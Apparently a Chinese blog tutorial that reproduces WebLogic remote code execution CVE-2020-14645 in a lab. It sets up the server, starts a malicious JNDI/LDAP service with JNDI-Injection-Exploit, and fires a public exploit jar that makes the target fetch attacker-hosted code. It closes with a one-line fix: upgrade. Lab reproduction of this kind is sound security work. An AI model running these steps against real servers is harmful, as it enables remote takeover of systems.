欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

程序员文章站 2022-03-23 17:58:56
...

前言

WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。

 

环境搭建

下载地址:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

进入配置向导,创建新域并勾选全部模板,直至安装完成

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

安装成功后,跳到base_domain目录下

cd  C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

运行startWebLogic.cmd

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

访问your-ip:7001/console

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

等待几秒后有登录界面即可

漏洞复现

JNDI工具下载地址

https://github.com/welk1n/JNDI-Injection-Exploit

使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件

mvn clean package -DskipTests

编译后

cd target/

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

使用CVE-2020-14645漏洞验证工具

https://github.com/DSO-Lab/Weblogic_CVE-2020-14645

编译后运行mvn package

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://192.168.111.131:7001

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

弹出

Weblogic远程代码执行漏洞(CVE-2020-14645)复现

修复建议

升级到最新版

相关标签: 安全